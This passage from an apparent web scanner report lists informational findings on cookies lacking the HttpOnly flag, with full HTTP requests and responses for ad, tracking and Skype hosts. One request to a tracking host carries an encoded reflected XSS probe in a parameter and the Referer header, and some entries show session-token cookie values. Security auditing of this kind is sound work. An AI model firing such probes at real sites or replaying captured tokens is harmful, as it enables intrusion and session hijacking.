Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

11.103. http://tag.admeld.com/ad/js/179/lijit/728x90/ros  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/js/179/lijit/728x90/ros

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/js/179/lijit/728x90/ros?url=http%3A//www.w3schools.com/jsref/tryit.asp%3Ffilename%3Dtryjsref_doc_anchors2 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.6143305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1963
Content-Type: application/javascript
Date: Mon, 05 Sep 2011 02:30:57 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com


document.write("<div style='width:728px,height:90px;margin:0;border:0'>");


document.write(unescape('%3Cscript%3E%20if%20%28typeof%20LJT_executeCB%20%3D%3D%20%27function%27%29%20%7B%20LJT
...[SNIP]...

11.104. http://tags.bluekai.com/site/4234  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/4234

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/4234?ret=html&limit=15&r=95685&phint=v30%3Dh30187%2Ferror%7Cview%3Dnone&phint=v16%3Dsolutions&phint=v24%3Dany&phint=v11%3Dapplied_use&phint=v26%3DUS&phint=v08%3DHP.com%20offers%20free%2C%20instructor-led%2C%20online%20business%2C%20technology%20and%20IT%20online%20classes%2C%20and%20quick%20lessons%3B%20all%20available%2024%2F7.&phint=v29%3Dany&phint=v31%3DHP%20System%20Error&phint=v32%3Dhttp%3A%2F%2Fh30187.www3.hp.com%2Findex.jspca059%2522%253E%253Cscript%253Eprompt(document.location)%253C%2Fscript%253Eaf8ce681eb5&phint=pageReferrer%3Dhttp%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Eaf8ce681eb5
Cookie: bk=D2OG+HhCdnkMq/0A; bkc=KJh56X6gOcWROdeFf1yur0JhxJENUGQqAKV9cYpk/LHCTIe3Tv/GB3NyGeCy5a1ATuv04TYe9bl0zieWyDPJKUZKt4tBKUTNm2r7IEfwftPIL89alnyS3wABCpyyLWYKKemydC1mKVcSc+zz48PK2U3WX6hob6cZmXrAC0y/w0qfZpu4+cEQSelhl9OL7XNv5Xh/Xf20MsbfIDeluyI+fbYKFSmjhN4KoFg24SO2S+Yrjp5aoeZFwmzewZk2CbU5Mo2uoDw6z8Fgkz2BGeAvnJW2uDXmuNXNua2Gc3ZEgibxerjJXdCr6IUT75SluwmwIhwpR8L4WmfNuU1d8VAFfDzdp57kWD+b0mPGJot4EymUnL2gE7ZxeZQrNLp2kK2GzuZBy9OT4EZtnztzPyfEIEFf1gYJHetfj9pY7azr291jOxStBgGzIpHpUgAG9Ii7XlduW3Epcz2kF8PeZwwvWHGFZfb7Fg6tr882uFFFBrKPMIk2VecQGvnPXUh9ZFwv1qv4XAlOGm1V7pE7kP2GFv66eyvMpR8gBUBKIjjzuzIMTUIlD7IlmSdXE4+NdtwQr4p4BXFuIHUuabUuq4x2rzl2k5KuflFkrioWhOIpuF/P; bko=KJ0fyzc9TaGEfz4/1/ZBQVsgi3X4mXBWqQiniKW6ayBen8ea0Yecetm58RSh4Gk9VWy15lCCRGk9NMDKAJQLcyweYpDqwtRsuuinAxW9OxGVBy==; bkp1=; bku=kQ199JnSvDfyUEoR; bkw5=KJ0aAEWFxNWRCodg8vofODDUfJouSRZOWv6f5v9eGLoudGu/iKQQ4GcajeHnpaQAAAqX9OabWpSes1Plzib76Ggk7JwFI5fFKdmKphaQ1mHKnoI+9MCTdLDhw/ySTLFP0XZTJ4D6OvZx4JKutLzWvsG3wRuzZNk2fkxQkgcbJwmEPMXZwRWUzCKeq3SUVILED2nashDcIA7m+m8vuH4iHUzktaTyVygfzeDcCzik0lkmA8gvezOClFC4r+SNkfhN2orXdAZ6hoPoY3vjpzbSjdt709qbW6vst0embSn5cozl75IJ3xq0VexolbeJq5suLrHvHXibEmLCLtnJl3GCmC7afGjJHFLTWO//KU467pIUGa66pG27Abp7UNjNj4S/SsvNx55cF5EbgXfVfabUofn5IyDAmcQH; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmpb4IudROueYy1ZHPRJxWlt90y; bkst=KJhBEf+v9NWDwWP91aWetZGPLwcY7FrIVrQSPyCZN6i/uL9irlzUJuxH1Ri2k7bOvqVhLTiPkHXQPGodTu5T5b+15jQj8L0DTc6KcvqgmNWJw+h5Q8C8BOaVWYA0ugiUS5/pNJ9AkMEVNiS2Nsh+qpFdkdwwyUMRcT8rC+IP6aadMkGsokO0vxPcnqDVE9MpVXCl84yeE87CUcZWoSi/PiRM6ioameG/0twHLtINlw2z7F7yDaYgaR9P/YQ1SrGhxjWpoEtMI5BMyIkgYy9PbcSwg68lypTm2iXZjlrm4NZzijGVDj2n9O+x2TBtzBeLBgBsJh3xTvHNKblwO2AGeeSpP7HTPOIwnGwx2TBmdS5RAPEpYAyZ1+q1/CD357rHozAWzFtIZk59e0VEDi3rLwl3HddTzNKo; __utma=252226138.2034852110.1313672419.1313672419.1313681721.2; __utmz=252226138.1313681721.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; bklc=4e63fe97; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 01:59:53 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e642d19; expires=Wed, 07-Sep-2011 01:59:53 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=WbE4+OhCdnkMq/0A; expires=Sat, 03-Mar-2012 01:59:53 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh566N/asWROdedf/yqBirJ8WskyWNUQT3XsubmK0MhLswxHPn01BuCSTzrQRWrL3/KY+oecq6aHRCbiVJUbBCCeXDvVht1AFUQHHeOMIKjlU4t4PbR7KUcdJd7djClk+3OSLlYpqw9+fsBJ4vp4xra6XYwTNFGoTRgBK7UnEcCnkFStjU8XUfosx4Y4hF2qPCGFxCLaKgwnuO6zPfblA+odkzr6KNMB8e5ZdHMtOCi4pe1T0rdodgN5KeriIZy7MtuAISXXG/ncBcbBFr0A425Awqoo8FgkqdqxeGwgJOMeE2dJwNpVnoLKwSt2/6KSS2nZL4UEP4A9Ng41LtdA3MwMt64xFiIvXl2km5SSeIZS1bSjhloszl8ulHIMipX6nhGmnTg7EEzS8MfvdIZhzUF99dObfLztMc1KKV9pkdht1/fNmFjN889ZwwvPhJ9VTIa+qzEAPle7aKItQj1647d1rgHIS86LF5EWmSXzGfsbbeFbzs7EaMwdAgfg8Fp0odo4EQkRsBQnwJiDogp0iP0QF/M7C58NJUZFw/KMq4VsAw0zEg0nzmzPd8ac3E7ISeo1K3FZdwvJfH446T+dWXNUPtPfCbxnF5JjICf6Ll2k5X6lFKg7KLIWKzvT4MT; expires=Sat, 03-Mar-2012 01:59:53 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmpb4IudROueYy1ZHDRAovbvUT91tXnRQ==; expires=Sat, 03-Mar-2012 01:59:53 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Tue, 06-Sep-2011 01:59:53 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
BK-Server: c612
Content-Length: 77
Content-Type: text/html

<html>
<head>
</head>
<body>
<div id="bk_exchange">

</div>

</body>
</html>

11.105. http://tracker.marinsm.com/rd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.marinsm.com
Path:   /rd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rd?cid=901pdb6671&mid=901qz26673&mkwid=s1CStlI5S&pcrid=13885348293&pkw=application%20security%20web&pmt=b&lp=http://altfarm.mediaplex.com/ad/ck/12309-80794-34740-0?kw=application%20security%20web&mpre=http%3A%2F%2Flt%2Edell%2Ecom%2Flt%2Flt%2Easpx%3FCID%3D64824%26LID%3D1652027%26DGC%3DST%26DGSeg%3DBSD%26DURL%3Dhttp%253A%252F%252Fcontent%252Edell%252Ecom%252Fus%252Fen%252Fbusiness%252Fsecurity%252Dnetwork%252Easpx%3Fst%3Dapplication%20security%20web%26ACD%3Ds1CStlI5S,13885348293,901qz26673 HTTP/1.1
Host: tracker.marinsm.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
P3P: CP="NOI DSP COR NID CUR ADM DEV OUR BUS"
Pragma: no-cache
Cache-Control: private, no-cache
Location: http://altfarm.mediaplex.com/ad/ck/12309-80794-34740-0?kw=application security web&mpre=http%3A%2F%2Flt.dell.com%2Flt%2Flt.aspx%3FCID%3D64824%26LID%3D1652027%26DGC%3DST%26DGSeg%3DBSD%26DURL%3Dhttp%253A%252F%252Fcontent%252Edell%252Ecom%252Fus%252Fen%252Fbusiness%252Fsecurity%252Dnetwork%252Easpx%3Fst%3Dapplication+security+web%26ACD%3Ds1CStlI5S%2C13885348293%2C901qz26673
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Sun, 04 Sep 2011 16:18:47 GMT
Connection: close
Set-Cookie: _msuuid=32d19f84-4f91-4f43-8f60-0290f902cb33; Domain=marinsm.com; Expires=Mon, 03-Sep-2012 16:18:47 GMT; Path=/


11.106. http://trk.etrigue.com/track.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.etrigue.com
Path:   /track.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track.php?ie=1&a1017=&b1017=&a1017exit=&a=1017&u=http%3A%2F%2Fwww.radware.com%2F&r=&t=1315153232081 HTTP/1.1
Host: trk.etrigue.com
Proxy-Connection: keep-alive
Referer: http://www.radware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
Set-Cookie: b1017=WzYzMzMxLC0xLC0xLC0xLC0xLDEwNzY2NiwzMDM3MTdd; expires=Wed, 01-Feb-2012 16:19:53 GMT; path=/
Set-Cookie: a1017exit=1315153193; expires=Wed, 01-Feb-2012 16:19:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:19:52 GMT
Content-Length: 142

etrigueCB1017({"name":"b1017","value":"WzYzMzMxLC0xLC0xLC0xLC0xLDEwNzY2NiwzMDM3MTdd"});etrigueCB1017({"name":"a1017exit","value":1315153193});

11.107. http://ui.skype.com/ui/0/5.5.0.114./en/help  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.skype.com
Path:   /ui/0/5.5.0.114./en/help

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/0/5.5.0.114./en/help HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:03:33 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170213:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 21:03:33 GMT; path=/; domain=.skype.com;
Location: https://support.skype.com/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en


11.108. http://ui.skype.com/ui/0/5.5.0.114./en/upgrade  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.skype.com
Path:   /ui/0/5.5.0.114./en/upgrade

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/0/5.5.0.114./en/upgrade HTTP/1.1
User-Agent: Skype Upgrade
Host: ui.skype.com

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:04:44 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:TM=1315170284:TS=1315170284:TZ=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 21:04:44 GMT; path=/; domain=.skype.com;
Location: http://download.skype.com/SkypeSetupFull.exe
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en


11.109. http://ui.skype.com/ui/0/5.5.0.114./en/upgraded  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.skype.com
Path:   /ui/0/5.5.0.114./en/upgraded

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/0/5.5.0.114./en/upgraded HTTP/1.1
User-Agent: Skype. 5.5
Host: ui.skype.com
Pragma: no-cache

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:58:15 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:TM=1315159095:TS=1315159095:TZ=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 17:58:15 GMT; path=/; domain=.skype.com;
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en


11.110. http://ui.skype.com/ui/0/5.5.0.115./en/go/apps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.skype.com
Path:   /ui/0/5.5.0.115./en/go/apps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/0/5.5.0.115./en/go/apps HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:08:54 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:08:54 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/apps
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en


11.111. http://ui.skype.com/ui/0/5.5.0.115./en/go/prices  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.skype.com
Path:   /ui/0/5.5.0.115./en/go/prices

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/0/5.5.0.115./en/go/prices HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170817:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:14:10 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170850:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:14:10 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/prices
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en


11.112. http://ui.skype.com/ui/0/5.5.0.115./en/go/share  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.skype.com
Path:   /ui/0/5.5.0.115./en/go/share

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/0/5.5.0.115./en/go/share HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:13:37 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170817:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:13:37 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/share?SkypeName=&FriendEmailAddr_1=&FriendEmailAddr_2=&FriendEmailAddr_3=&FriendEmailAddr_4=&FriendEmailAddr_5=&FriendEmailAddr_6=&FriendName_1=&FriendName_2=&FriendName_3=&FriendName_4=&FriendName_5=&FriendName_6=
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en


11.113. http://ui.skype.com/ui/0/5.5.0.115./en/go/subscriptions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ui.skype.com
Path:   /ui/0/5.5.0.115./en/go/subscriptions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ui/0/5.5.0.115./en/go/subscriptions?country= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: ui.skype.com
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170850:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 21:27:02 GMT
Server: Apache
Cache-control: no-cache, must revalidate
Pragma: no-cache
Expires: 0
Set-Cookie: SC=CC=:CCY=:E70B9EF1770AF398=:LC=en-us:TM=1315171622:TS=1315171562:TZ=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:27:02 GMT; path=/; domain=.skype.com;
Location: http://www.skype.com/go/subscriptions?cm_mmc=Skype-_-Dynamic_Content-_-Subscriptions-_-Generic4
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en


11.114. http://vap1den1.lijit.com/www/delivery/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vap1den1.lijit.com
Path:   /www/delivery/lg.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/delivery/lg.php?bannerid=785&campaignid=301&cids=294,301&bids=600,785&zoneid=128348&channel_ids=,&OABLOCK=86400&OACAP=24&OASCAP=24&loc=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_base_href&referer=http%3A%2F%2Fwww.w3schools.com%2Fjsref%2Ftryit.asp%3Ffilename%3Dtryjsref_base_href&cb=8f19e12354 HTTP/1.1
Host: vap1den1.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/tryitbanner.asp?secid=tryjs&rnd=0.2226068
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljtrtb=eJyrVjJSslIyMbY0NTJxdLVwNnMyMzZxNTAydDN1M7cA0mZmBkYGSrUAtFMI1w%3D%3D; ljt_csync=rtb_turn%2Crtb_simplifi%2Crtb_mmath%2C1; ljt_reader=9a524261efe1e1588396f48f16471b3c; OABLOCK=785.1315190052; OACAP=785.11; OASCAP=785.11

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: _OABLOCK[785]=1315190056; expires=Wed, 05-Oct-2011 02:34:16 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[354]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[63]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[1509702]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B1509702%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OABLOCK[7851509702]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOABLOCK%5B7851509702%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785]=1; expires=Tue, 04-Sep-2012 02:34:16 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[354]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[63]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[78563]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B78563%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[1509702]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B1509702%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OACAP[7851509702]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOACAP%5B7851509702%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785]=1; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[354]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[785354]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B785354%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: _OASCAP[63]=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
Set-Cookie: %5FOASCAP%5B63%5D=deleted; expires=Sun, 05-Sep-2010 02:34:15 GMT; path=/; domain=.lijit.com
